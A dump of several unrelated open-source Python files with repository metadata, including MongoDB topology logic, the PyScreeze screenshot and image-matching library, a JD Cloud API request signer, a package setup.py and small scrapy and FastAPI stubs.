server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos): sds.pop(address) topology_type = _check_has_primary(sds) elif server_type == SERVER_TYPE.RSPrimary: (topology_type, set_name, max_set_version, max_election_id) = _update_rs_from_primary(sds, set_name, server_description, max_set_version, max_election_id) elif server_type in ( SERVER_TYPE.RSSecondary, SERVER_TYPE.RSArbiter, SERVER_TYPE.RSOther): topology_type = _update_rs_with_primary_from_member( sds, set_name, server_description) else: # Server type is Unknown or RSGhost: did we just lose the primary? topology_type = _check_has_primary(sds) # Return updated copy. return TopologyDescription(topology_type, sds, set_name, max_set_version, max_election_id, topology_description._topology_settings) def _update_rs_from_primary( sds, replica_set_name, server_description, max_set_version, max_election_id): """Update topology description from a primary's ismaster response. Pass in a dict of ServerDescriptions, current replica set name, the ServerDescription we are processing, and the TopologyDescription's max_set_version and max_election_id if any. Returns (new topology type, new replica_set_name, new max_set_version, new max_election_id). """ if replica_set_name is None: replica_set_name = server_description.replica_set_name elif replica_set_name != server_description.replica_set_name: # We found a primary but it doesn't have the replica_set_name # provided by the user. sds.pop(server_description.address) return (_check_has_primary(sds), replica_set_name, max_set_version, max_election_id) max_election_tuple = max_set_version, max_election_id if None not in server_description.election_tuple: if (None not in max_election_tuple and max_election_tuple > server_description.election_tuple): # Stale primary, set to type Unknown. address = server_description.address sds[address] = ServerDescription(address) return (_check_has_primary(sds), replica_set_name, max_set_version, max_election_id) max_election_id = server_description.election_id if (server_description.set_version is not None and (max_set_version is None or server_description.set_version > max_set_version)): max_set_version = server_description.set_version # We've heard from the primary. Is it the same primary as before? for server in sds.values(): if (server.server_type is SERVER_TYPE.RSPrimary and server.address != server_description.address): # Reset old primary's type to Unknown. sds[server.address] = ServerDescription(server.address) # There can be only one prior primary. break # Discover new hosts from this primary's response. for new_address in server_description.all_hosts: if new_address not in sds: sds[new_address] = ServerDescription(new_address) # Remove hosts not in the response. for addr in set(sds) - server_description.all_hosts: sds.pop(addr) # If the host list differs from the seed list, we may not have a primary # after all. return (_check_has_primary(sds), replica_set_name, max_set_version, max_election_id) def _update_rs_with_primary_from_member( sds, replica_set_name, server_description): """RS with known primary. Process a response from a non-primary. Pass in a dict of ServerDescriptions, current replica set name, and the ServerDescription we are processing. Returns new topology type. """ assert replica_set_name is not None if replica_set_name != server_description.replica_set_name: sds.pop(server_description.address) elif (server_description.me and server_description.address != server_description.me): sds.pop(server_description.address) # Had this member been the primary? return _check_has_primary(sds) def _update_rs_no_primary_from_member( sds, replica_set_name, server_description): """RS without known primary. Update from a non-primary's response. Pass in a dict of ServerDescriptions, current replica set name, and the ServerDescription we are processing. Returns (new topology type, new replica_set_name). """ topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary if replica_set_name is None: replica_set_name = server_description.replica_set_name elif replica_set_name != server_description.replica_set_name: sds.pop(server_description.address) return topology_type, replica_set_name # This isn't the primary's response, so don't remove any servers # it doesn't report. Only add new servers. for address in server_description.all_hosts: if address not in sds: sds[address] = ServerDescription(address) if (server_description.me and server_description.address != server_description.me): sds.pop(server_description.address) return topology_type, replica_set_name def _check_has_primary(sds): """Current topology type is ReplicaSetWithPrimary. Is primary still known? Pass in a dict of ServerDescriptions. Returns new topology type. """ for s in sds.values(): if s.server_type == SERVER_TYPE.RSPrimary: return TOPOLOGY_TYPE.ReplicaSetWithPrimary else: return TOPOLOGY_TYPE.ReplicaSetNoPrimary
37.785714
79
0.643255
de20db9d20b3fea301e302fd208e22c155e603ef
23,323
py
Python
venv/Lib/site-packages/pyscreeze/__init__.py
SteevenBrunner/gmail-generator
0ab6f047faad48c388c6d7d2b887f33b6839b6f9
[ "MIT" ]
102
2018-11-06T21:54:27.000Z
2022-02-26T16:35:06.000Z
venv/Lib/site-packages/pyscreeze/__init__.py
AsterLaoWhy/Navi
819e4cc9e70721d65da5979e0c7a6fead9eb9d6e
[ "MIT" ]
26
2018-10-09T13:40:18.000Z
2021-10-16T23:28:26.000Z
venv/Lib/site-packages/pyscreeze/__init__.py
AsterLaoWhy/Navi
819e4cc9e70721d65da5979e0c7a6fead9eb9d6e
[ "MIT" ]
36
2018-08-08T03:43:00.000Z
2022-02-02T16:29:55.000Z
# PyScreeze """ NOTE: Apparently Pillow support on Ubuntu 64-bit has several additional steps since it doesn't have JPEG/PNG support out of the box. Description here: https://stackoverflow.com/questions/7648200/pip-install-pil-e-tickets-1-no-jpeg-png-support http://ubuntuforums.org/showthread.php?t=1751455 """ __version__ = '0.1.26' import collections import datetime import functools import os import subprocess import sys import time import errno from contextlib import contextmanager try: from PIL import Image from PIL import ImageOps from PIL import ImageDraw if sys.platform == 'win32': # TODO - Pillow now supports ImageGrab on macOS. from PIL import ImageGrab _PILLOW_UNAVAILABLE = False except ImportError: # We ignore this because failures due to Pillow not being installed # should only happen when the functions that specifically depend on # Pillow are called. The main use case is when PyAutoGUI imports # PyScreeze, but Pillow isn't installed because the user is running # some platform/version of Python that Pillow doesn't support, then # importing PyAutoGUI should not automatically fail because it # imports PyScreeze. # So we have a `pass` statement here since a failure to import # Pillow shouldn't crash PyScreeze. _PILLOW_UNAVAILABLE = True try: import cv2, numpy useOpenCV = True RUNNING_CV_2 = cv2.__version__[0] < '3' except ImportError: useOpenCV = False RUNNING_PYTHON_2 = sys.version_info[0] == 2 if useOpenCV: if RUNNING_CV_2: LOAD_COLOR = cv2.CV_LOAD_IMAGE_COLOR LOAD_GRAYSCALE = cv2.CV_LOAD_IMAGE_GRAYSCALE else: LOAD_COLOR = cv2.IMREAD_COLOR LOAD_GRAYSCALE = cv2.IMREAD_GRAYSCALE if not RUNNING_PYTHON_2: unicode = str # On Python 3, all the isinstance(spam, (str, unicode)) calls will work the same as Python 2. if sys.platform == 'win32': # On Windows, the monitor scaling can be set to something besides normal 100%. # PyScreeze and Pillow needs to account for this to make accurate screenshots. # TODO - How does macOS and Linux handle monitor scaling? import ctypes try: ctypes.windll.user32.SetProcessDPIAware() except AttributeError: pass # Windows XP doesn't support monitor scaling, so just do nothing. GRAYSCALE_DEFAULT = False # For version 0.1.19 I changed it so that ImageNotFoundException was raised # instead of returning None. In hindsight, this change came too late, so I'm # changing it back to returning None. But I'm also including this option for # folks who would rather have it raise an exception. USE_IMAGE_NOT_FOUND_EXCEPTION = False scrotExists = False try: if sys.platform not in ('java', 'darwin', 'win32'): whichProc = subprocess.Popen( ['which', 'scrot'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) scrotExists = whichProc.wait() == 0 except OSError as ex: if ex.errno == errno.ENOENT: # if there is no "which" program to find scrot, then assume there # is no scrot. pass else: raise if sys.platform == 'win32': from ctypes import windll # win32 DC(DeviceContext) Manager @contextmanager def __win32_openDC(hWnd): """ TODO """ hDC = windll.user32.GetDC(hWnd) if hDC == 0: #NULL raise WindowsError("windll.user32.GetDC failed : return NULL") try: yield hDC finally: if windll.user32.ReleaseDC(hWnd, hDC) == 0: raise WindowsError("windll.user32.ReleaseDC failed : return 0") Box = collections.namedtuple('Box', 'left top width height') Point = collections.namedtuple('Point', 'x y') RGB = collections.namedtuple('RGB', 'red green blue') class PyScreezeException(Exception): pass # This is a generic exception class raised when a PyScreeze-related error happens. class ImageNotFoundException(PyScreezeException): pass # This is an exception class raised when the locate functions fail to locate an image. def requiresPillow(wrappedFunction): """ A decorator that marks a function as requiring Pillow to be installed. This raises PyScreezeException if Pillow wasn't imported. """ @functools.wraps(wrappedFunction) def wrapper(*args, **kwargs): if _PILLOW_UNAVAILABLE: raise PyScreezeException('The Pillow package is required to use this function.') return wrappedFunction(*args, **kwargs) return wrapper def _load_cv2(img, grayscale=None): """ TODO """ # load images if given filename, or convert as needed to opencv # Alpha layer just causes failures at this point, so flatten to RGB. # RGBA: load with -1 * cv2.CV_LOAD_IMAGE_COLOR to preserve alpha # to matchTemplate, need template and image to be the same wrt having alpha if grayscale is None: grayscale = GRAYSCALE_DEFAULT if isinstance(img, (str, unicode)): # The function imread loads an image from the specified file and # returns it. If the image cannot be read (because of missing # file, improper permissions, unsupported or invalid format), # the function returns an empty matrix # http://docs.opencv.org/3.0-beta/modules/imgcodecs/doc/reading_and_writing_images.html if grayscale: img_cv = cv2.imread(img, LOAD_GRAYSCALE) else: img_cv = cv2.imread(img, LOAD_COLOR) if img_cv is None: raise IOError("Failed to read %s because file is missing, " "has improper permissions, or is an " "unsupported or invalid format" % img) elif isinstance(img, numpy.ndarray): # don't try to convert an already-gray image to gray if grayscale and len(img.shape) == 3: # and img.shape[2] == 3: img_cv = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) else: img_cv = img elif hasattr(img, 'convert'): # assume its a PIL.Image, convert to cv format img_array = numpy.array(img.convert('RGB')) img_cv = img_array[:, :, ::-1].copy() # -1 does RGB -> BGR if grayscale: img_cv = cv2.cvtColor(img_cv, cv2.COLOR_BGR2GRAY) else: raise TypeError('expected an image filename, OpenCV numpy array, or PIL image') return img_cv def _locateAll_opencv(needleImage, haystackImage, grayscale=None, limit=10000, region=None, step=1, confidence=0.999): """ TODO - rewrite this faster but more memory-intensive than pure python step 2 skips every other row and column = ~3x faster but prone to miss; to compensate, the algorithm automatically reduces the confidence threshold by 5% (which helps but will not avoid all misses). limitations: - OpenCV 3.x & python 3.x not tested - RGBA images are treated as RBG (ignores alpha channel) """ if grayscale is None: grayscale = GRAYSCALE_DEFAULT confidence = float(confidence) needleImage = _load_cv2(needleImage, grayscale) needleHeight, needleWidth = needleImage.shape[:2] haystackImage = _load_cv2(haystackImage, grayscale) if region: haystackImage = haystackImage[region[1]:region[1]+region[3], region[0]:region[0]+region[2]] else: region = (0, 0) # full image; these values used in the yield statement if (haystackImage.shape[0] < needleImage.shape[0] or haystackImage.shape[1] < needleImage.shape[1]): # avoid semi-cryptic OpenCV error below if bad size raise ValueError('needle dimension(s) exceed the haystack image or region dimensions') if step == 2: confidence *= 0.95 needleImage = needleImage[::step, ::step] haystackImage = haystackImage[::step, ::step] else: step = 1 # get all matches at once, credit: https://stackoverflow.com/questions/7670112/finding-a-subimage-inside-a-numpy-image/9253805#9253805 result = cv2.matchTemplate(haystackImage, needleImage, cv2.TM_CCOEFF_NORMED) match_indices = numpy.arange(result.size)[(result > confidence).flatten()] matches = numpy.unravel_index(match_indices[:limit], result.shape) if len(matches[0]) == 0: if USE_IMAGE_NOT_FOUND_EXCEPTION: raise ImageNotFoundException('Could not locate the image (highest confidence = %.3f)' % result.max()) else: return # use a generator for API consistency: matchx = matches[1] * step + region[0] # vectorized matchy = matches[0] * step + region[1] for x, y in zip(matchx, matchy): yield Box(x, y, needleWidth, needleHeight) # TODO - We should consider renaming _locateAll_python to _locateAll_pillow, since Pillow is the real dependency. @requiresPillow def _locateAll_python(needleImage, haystackImage, grayscale=None, limit=None, region=None, step=1): """ TODO """ # setup all the arguments if grayscale is None: grayscale = GRAYSCALE_DEFAULT needleFileObj = None if isinstance(needleImage, (str, unicode)): # 'image' is a filename, load the Image object needleFileObj = open(needleImage, 'rb') needleImage = Image.open(needleFileObj) haystackFileObj = None if isinstance(haystackImage, (str, unicode)): # 'image' is a filename, load the Image object haystackFileObj = open(haystackImage, 'rb') haystackImage = Image.open(haystackFileObj) if region is not None: haystackImage = haystackImage.crop((region[0], region[1], region[0] + region[2], region[1] + region[3])) else: region = (0, 0) # set to 0 because the code always accounts for a region if grayscale: # if grayscale mode is on, convert the needle and haystack images to grayscale needleImage = ImageOps.grayscale(needleImage) haystackImage = ImageOps.grayscale(haystackImage) else: # if not using grayscale, make sure we are comparing RGB images, not RGBA images. if needleImage.mode == 'RGBA': needleImage = needleImage.convert('RGB') if haystackImage.mode == 'RGBA': haystackImage = haystackImage.convert('RGB') # setup some constants we'll be using in this function needleWidth, needleHeight = needleImage.size haystackWidth, haystackHeight = haystackImage.size needleImageData = tuple(needleImage.getdata()) haystackImageData = tuple(haystackImage.getdata()) needleImageRows = [needleImageData[y * needleWidth:(y+1) * needleWidth] for y in range(needleHeight)] # LEFT OFF - check this needleImageFirstRow = needleImageRows[0] assert len(needleImageFirstRow) == needleWidth, 'For some reason, the calculated width of first row of the needle image is not the same as the width of the image.' assert [len(row) for row in needleImageRows] == [needleWidth] * needleHeight, 'For some reason, the needleImageRows aren\'t the same size as the original image.' numMatchesFound = 0 # NOTE: After running tests/benchmarks.py on the following code, it seem that having a step # value greater than 1 does not give *any* significant performance improvements. # Since using a step higher than 1 makes for less accurate matches, it will be # set to 1. step = 1 # hard-code step as 1 until a way to improve it can be figured out. if step == 1: firstFindFunc = _kmp else: firstFindFunc = _steppingFind for y in range(haystackHeight): # start at the leftmost column for matchx in firstFindFunc(needleImageFirstRow, haystackImageData[y * haystackWidth:(y+1) * haystackWidth], step): foundMatch = True for searchy in range(1, needleHeight, step): haystackStart = (searchy + y) * haystackWidth + matchx if needleImageData[searchy * needleWidth:(searchy+1) * needleWidth] != haystackImageData[haystackStart:haystackStart + needleWidth]: foundMatch = False break if foundMatch: # Match found, report the x, y, width, height of where the matching region is in haystack. numMatchesFound += 1 yield Box(matchx + region[0], y + region[1], needleWidth, needleHeight) if limit is not None and numMatchesFound >= limit: # Limit has been reached. Close file handles. if needleFileObj is not None: needleFileObj.close() if haystackFileObj is not None: haystackFileObj.close() return # There was no limit or the limit wasn't reached, but close the file handles anyway. if needleFileObj is not None: needleFileObj.close() if haystackFileObj is not None: haystackFileObj.close() if numMatchesFound == 0: if USE_IMAGE_NOT_FOUND_EXCEPTION: raise ImageNotFoundException('Could not locate the image.') else: return def locate(needleImage, haystackImage, **kwargs): """ TODO """ # Note: The gymnastics in this function is because we want to make sure to exhaust the iterator so that the needle and haystack files are closed in locateAll. kwargs['limit'] = 1 points = tuple(locateAll(needleImage, haystackImage, **kwargs)) if len(points) > 0: return points[0] else: if USE_IMAGE_NOT_FOUND_EXCEPTION: raise ImageNotFoundException('Could not locate the image.') else: return None def locateOnScreen(image, minSearchTime=0, **kwargs): """TODO - rewrite this minSearchTime - amount of time in seconds to repeat taking screenshots and trying to locate a match. The default of 0 performs a single search. """ start = time.time() while True: try: screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here. retVal = locate(image, screenshotIm, **kwargs) try: screenshotIm.fp.close() except AttributeError: # Screenshots on Windows won't have an fp since they came from # ImageGrab, not a file. Screenshots on Linux will have fp set # to None since the file has been unlinked pass if retVal or time.time() - start > minSearchTime: return retVal except ImageNotFoundException: if time.time() - start > minSearchTime: if USE_IMAGE_NOT_FOUND_EXCEPTION: raise else: return None def locateAllOnScreen(image, **kwargs): """ TODO """ # TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator? screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here. retVal = locateAll(image, screenshotIm, **kwargs) try: screenshotIm.fp.close() except AttributeError: # Screenshots on Windows won't have an fp since they came from # ImageGrab, not a file. Screenshots on Linux will have fp set # to None since the file has been unlinked pass return retVal def locateCenterOnScreen(image, **kwargs): """ TODO """ coords = locateOnScreen(image, **kwargs) if coords is None: return None else: return center(coords) @requiresPillow def showRegionOnScreen(region, outlineColor='red', filename='_showRegionOnScreen.png'): """ TODO """ # TODO - This function is useful! Document it! screenshotIm = screenshot() draw = ImageDraw.Draw(screenshotIm) region = (region[0], region[1], region[2] + region[0], region[3] + region[1]) # convert from (left, top, right, bottom) to (left, top, width, height) draw.rectangle(region, outline=outlineColor) screenshotIm.save(filename) @requiresPillow def _screenshot_win32(imageFilename=None, region=None): """ TODO """ # TODO - Use the winapi to get a screenshot, and compare performance with ImageGrab.grab() # https://stackoverflow.com/a/3586280/1893164 im = ImageGrab.grab() if region is not None: assert len(region) == 4, 'region argument must be a tuple of four ints' region = [int(x) for x in region] im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1])) if imageFilename is not None: im.save(imageFilename) return im def _screenshot_osx(imageFilename=None, region=None): """ TODO """ # TODO - use tmp name for this file. if imageFilename is None: tmpFilename = 'screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f')) else: tmpFilename = imageFilename subprocess.call(['screencapture', '-x', tmpFilename]) im = Image.open(tmpFilename) if region is not None: assert len(region) == 4, 'region argument must be a tuple of four ints' region = [int(x) for x in region] im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1])) os.unlink(tmpFilename) # delete image of entire screen to save cropped version im.save(tmpFilename) else: # force loading before unlinking, Image.open() is lazy im.load() if imageFilename is None: os.unlink(tmpFilename) return im def _screenshot_linux(imageFilename=None, region=None): """ TODO """ if not scrotExists: raise NotImplementedError('"scrot" must be installed to use screenshot functions in Linux. Run: sudo apt-get install scrot') if imageFilename is None: tmpFilename = '.screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f')) else: tmpFilename = imageFilename if scrotExists: subprocess.call(['scrot', '-z', tmpFilename]) im = Image.open(tmpFilename) if region is not None: assert len(region) == 4, 'region argument must be a tuple of four ints' region = [int(x) for x in region] im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1])) os.unlink(tmpFilename) # delete image of entire screen to save cropped version im.save(tmpFilename) else: # force loading before unlinking, Image.open() is lazy im.load() if imageFilename is None: os.unlink(tmpFilename) return im else: raise Exception('The scrot program must be installed to take a screenshot with PyScreeze on Linux. Run: sudo apt-get install scrot') def _kmp(needle, haystack, _dummy): # Knuth-Morris-Pratt search algorithm implementation (to be used by screen capture) """ TODO """ # build table of shift amounts shifts = [1] * (len(needle) + 1) shift = 1 for pos in range(len(needle)): while shift <= pos and needle[pos] != needle[pos-shift]: shift += shifts[pos-shift] shifts[pos+1] = shift # do the actual search startPos = 0 matchLen = 0 for c in haystack: while matchLen == len(needle) or \ matchLen >= 0 and needle[matchLen] != c: startPos += shifts[matchLen] matchLen -= shifts[matchLen] matchLen += 1 if matchLen == len(needle): yield startPos def _steppingFind(needle, haystack, step): """ TODO """ for startPos in range(0, len(haystack) - len(needle) + 1): foundMatch = True for pos in range(0, len(needle), step): if haystack[startPos + pos] != needle[pos]: foundMatch = False break if foundMatch: yield startPos def center(coords): """ Returns a `Point` object with the x and y set to an integer determined by the format of `coords`. The `coords` argument is a 4-integer tuple of (left, top, width, height). For example: >>> center((10, 10, 6, 8)) Point(x=13, y=14) >>> center((10, 10, 7, 9)) Point(x=13, y=14) >>> center((10, 10, 8, 10)) Point(x=14, y=15) """ # TODO - one day, add code to handle a Box namedtuple. return Point(coords[0] + int(coords[2] / 2), coords[1] + int(coords[3] / 2)) def pixelMatchesColor(x, y, expectedRGBColor, tolerance=0): """ TODO """ pix = pixel(x, y) if len(pix) == 3 or len(expectedRGBColor) == 3: #RGB mode r, g, b = pix[:3] exR, exG, exB = expectedRGBColor[:3] return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance) elif len(pix) == 4 and len(expectedRGBColor) == 4: #RGBA mode r, g, b, a = pix exR, exG, exB, exA = expectedRGBColor return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance) and (abs(a - exA) <= tolerance) else: assert False, 'Color mode was expected to be length 3 (RGB) or 4 (RGBA), but pixel is length %s and expectedRGBColor is length %s' % (len(pix), len(expectedRGBColor)) def pixel(x, y): """ TODO """ if sys.platform == 'win32': # On Windows, calling GetDC() and GetPixel() is twice as fast as using our screenshot() function. with __win32_openDC(0) as hdc: # handle will be released automatically color = windll.gdi32.GetPixel(hdc, x, y) if color < 0: raise WindowsError("windll.gdi32.GetPixel failed : return {}".format(color)) # color is in the format 0xbbggrr https://msdn.microsoft.com/en-us/library/windows/desktop/dd183449(v=vs.85).aspx bbggrr = "{:0>6x}".format(color) # bbggrr => 'bbggrr' (hex) b, g, r = (int(bbggrr[i:i+2], 16) for i in range(0, 6, 2)) return (r, g, b) else: # Need to select only the first three values of the color in # case the returned pixel has an alpha channel return RGB(*(screenshot().getpixel((x, y))[:3])) # set the screenshot() function based on the platform running this module if sys.platform.startswith('java'): raise NotImplementedError('Jython is not yet supported by PyScreeze.') elif sys.platform == 'darwin': screenshot = _screenshot_osx elif sys.platform == 'win32': screenshot = _screenshot_win32 else: # TODO - Make this more specific. "Anything else" does not necessarily mean "Linux". screenshot = _screenshot_linux grab = screenshot # for compatibility with Pillow/PIL's ImageGrab module. # set the locateAll function to use opencv if possible; python 3 needs opencv 3.0+ # TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator? if useOpenCV: locateAll = _locateAll_opencv if not RUNNING_PYTHON_2 and cv2.__version__ < '3': locateAll = _locateAll_python else: locateAll = _locateAll_python
38.171849
174
0.648673
4fcf9bb01e0eb8a58b1e7521096ed04c70a219ff
1,076
py
Python
setup.py
DoctorJohn/eponym
dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a
[ "MIT" ]
1
2019-11-19T21:06:43.000Z
2019-11-19T21:06:43.000Z
setup.py
DoctorJohn/eponym
dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a
[ "MIT" ]
1
2019-11-19T19:35:29.000Z
2019-11-19T19:35:29.000Z
setup.py
DoctorJohn/eponym
dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a
[ "MIT" ]
null
null
null
import os from setuptools import find_packages, setup from eponym import __version__ with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme: README = readme.read() os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir))) setup( name='eponym', version=__version__, packages=find_packages(), include_package_data=True, license='MIT License', description='Decent username generator based on handpicked wordlists', long_description=README, long_description_content_type='text/markdown', url='https://github.com/DoctorJohn/eponym', author='Jonathan Ehwald', author_email='pypi@ehwald.info', classifiers=[ 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], )
30.742857
78
0.724907
2b06991a3be00249a7eb90ca63f5b5604ae67b14
6,185
py
Python
jdcloud_sdk/core/signer.py
jdcloud-demo/jdcloud-sdk-python
fddc2af24031c597948b8b8091978ac7e01a2695
[ "Apache-2.0" ]
null
null
null
jdcloud_sdk/core/signer.py
jdcloud-demo/jdcloud-sdk-python
fddc2af24031c597948b8b8091978ac7e01a2695
[ "Apache-2.0" ]
null
null
null
jdcloud_sdk/core/signer.py
jdcloud-demo/jdcloud-sdk-python
fddc2af24031c597948b8b8091978ac7e01a2695
[ "Apache-2.0" ]
null
null
null
# coding=utf8 # Copyright 2018 JDCLOUD.COM # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import time import hashlib import hmac import re import uuid from . import const from .logger import INFO from .util import quote class Signer(object): ignored_headers = ['authorization', 'user-agent'] def __init__(self, logger): self.__logger = logger def sign(self, method, service, region, uri, headers, data, credential, security_token): uri_dict = self.__url_path_to_dict(uri) host = uri_dict['host'] port = uri_dict['port'] query = uri_dict['query'] canonical_uri = quote(uri_dict['path']) if port and port not in ['80', '443']: full_host = host + ':' + port else: full_host = host now = self.__now() jdcloud_date = now.strftime('%Y%m%dT%H%M%SZ') datestamp = now.strftime('%Y%m%d') # Date w/o time, used in credential scope nonce = str(uuid.uuid4()) headers[const.JDCLOUD_DATE] = jdcloud_date headers[const.JDCLOUD_NONCE] = nonce canonical_querystring = self.__normalize_query_string(query) canonical_headers, signed_headers = self.__build_canonical_headers(headers, security_token, full_host) payload_hash = self.__sha256_hash(data) canonical_request = (method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers + '\n' + signed_headers + '\n' + payload_hash) algorithm = const.JDCLOUD_ALGORITHM credential_scope = (datestamp + '/' + region + '/' + service + '/' + const.JDCLOUD_REQUEST) string_to_sign = (algorithm + '\n' + jdcloud_date + '\n' + credential_scope + '\n' + self.__sha256_hash(canonical_request)) self.__logger.log(INFO, '---canonical_request---\n' + canonical_request) self.__logger.log(INFO, '----string_to_sign---\n' + string_to_sign) signing_key = self.__get_signature_key(credential.secret_key, datestamp, region, service) encoded = string_to_sign.encode('utf-8') signature = hmac.new(signing_key, encoded, hashlib.sha256).hexdigest() authorization_header = ( algorithm + ' ' + 'Credential=' + credential.access_key + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature ) headers.update({ const.JDCLOUD_AUTH: authorization_header, const.JDCLOUD_DATE: jdcloud_date, const.JDCLOUD_CONTENT_SHA256: payload_hash, const.JDCLOUD_ALGORITHM: const.JDCLOUD_ALGORITHM, const.JDCLOUD_NONCE: nonce }) if security_token: headers.update({const.JDCLOUD_SECURITY_TOKEN: security_token}) def __normalize_query_string(self, query): params = (list(map(str.strip, s.split("="))) for s in query.split('&') if len(s) > 0) normalized = '&'.join('%s=%s' % (p[0], p[1] if len(p) > 1 else '') for p in sorted(params)) return normalized def __now(self): return datetime.datetime.utcfromtimestamp(time.time()) def __url_path_to_dict(self, path): """http://stackoverflow.com/a/17892757/142207""" pattern = (r'^' r'((?P<schema>.+?)://)?' r'((?P<user>.+?)(:(?P<password>.*?))?@)?' r'(?P<host>.*?)' r'(:(?P<port>\d+?))?' r'(?P<path>/.*?)?' r'(\?(?P<query>.*?))?' r'$') regex = re.compile(pattern) match = regex.match(path) group_dict = match.groupdict() if match is not None else None if group_dict['path'] is None: group_dict['path'] = '/' if group_dict['query'] is None: group_dict['query'] = '' return group_dict def __sign(self, key, msg): return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest() def __get_signature_key(self, key, date_stamp, region_name, service_name): k_date = self.__sign((const.JDCLOUD2 + key).encode('utf-8'), date_stamp) k_region = self.__sign(k_date, region_name) k_service = self.__sign(k_region, service_name) k_signing = self.__sign(k_service, const.JDCLOUD_REQUEST) return k_signing def __sha256_hash(self, val): return hashlib.sha256(val.encode('utf-8')).hexdigest() def __build_canonical_headers(self, req_headers, security_token, full_host): headers = ['host'] # add host header first signed_values = {} for key in req_headers.keys(): value = req_headers[key] lower_key = key.lower() if lower_key in Signer.ignored_headers: continue headers.append(lower_key) signed_values[lower_key] = value headers.sort() signed_headers = ';'.join(headers) canonical_values = [] for key in headers: if key == 'host': canonical_values.append('host:' + full_host) else: canonical_values.append(key + ':' + signed_values[key]) canonical_headers = '\n'.join(canonical_values) + '\n' return canonical_headers, signed_headers
35.142045
110
0.575424
1a4f527e408506ad2bef95c1c008b12e97f72aa4
285
py
Python
it168/it168/pipelines.py
ripples-alive/Crawler
61f7c253deb196fddc254f9603706589af79ed3f
[ "MIT" ]
1
2017-02-24T03:34:03.000Z
2017-02-24T03:34:03.000Z
it168/it168/pipelines.py
JayvicWen/Crawler
61f7c253deb196fddc254f9603706589af79ed3f
[ "MIT" ]
null
null
null
it168/it168/pipelines.py
JayvicWen/Crawler
61f7c253deb196fddc254f9603706589af79ed3f
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html class It168Pipeline(object): def process_item(self, item, spider): return item
23.75
65
0.708772
c92def7193a320a21f1cbe2239ba52cd86236901
601
py
Python
stella_api/core/models/app.py
InterStella0/stella_api
3ab33767de8fac4cec23db87900c8eea6905adcc
[ "MIT" ]
null
null
null
stella_api/core/models/app.py
InterStella0/stella_api
3ab33767de8fac4cec23db87900c8eea6905adcc
[ "MIT" ]
null
null
null
stella_api/core/models/app.py
InterStella0/stella_api
3ab33767de8fac4cec23db87900c8eea6905adcc
[ "MIT" ]
1
2022-03-08T14:50:27.000Z
2022-03-08T14:50:27.000Z
from __future__ import annotations from typing import TYPE_CHECKING from fastapi import FastAPI from stella_api.core.utils.errors import FailureLoadVersion if TYPE_CHECKING: from stella_api.core.models import RouteBase __all__ = ("StellaAPI",) class StellaAPI(FastAPI): def __init__(self) -> None: super().__init__(title="Stella API") def create_route(self, router: RouteBase) -> None: try: router.setup() self.include_router(router.router, prefix=router.prefix) except Exception: raise FailureLoadVersion(router.prefix)
24.04
68
0.705491
f153ab57d43ae44c48f5e61396700dcb09e5342a
1,363
py
Python
s2e_env/commands/project_creation/__init__.py
lzto/s2e-env-1
e7d26b9c5b0f0b203fb335de0a952e70440e7d0a
[ "BSD-3-Clause" ]
55
2019-12-20T03:25:14.000Z
2022-01-16T07:19:47.000Z
s2e_env/commands/project_creation/__init__.py
lzto/s2e-env-1
e7d26b9c5b0f0b203fb335de0a952e70440e7d0a
[ "BSD-3-Clause" ]
2
2020-11-02T08:01:00.000Z
2022-03-27T02:59:18.000Z
s2e_env/commands/project_creation/__init__.py
lzto/s2e-env-1
e7d26b9c5b0f0b203fb335de0a952e70440e7d0a
[ "BSD-3-Clause" ]
11
2020-08-06T03:59:45.000Z
2022-02-25T02:31:59.000Z
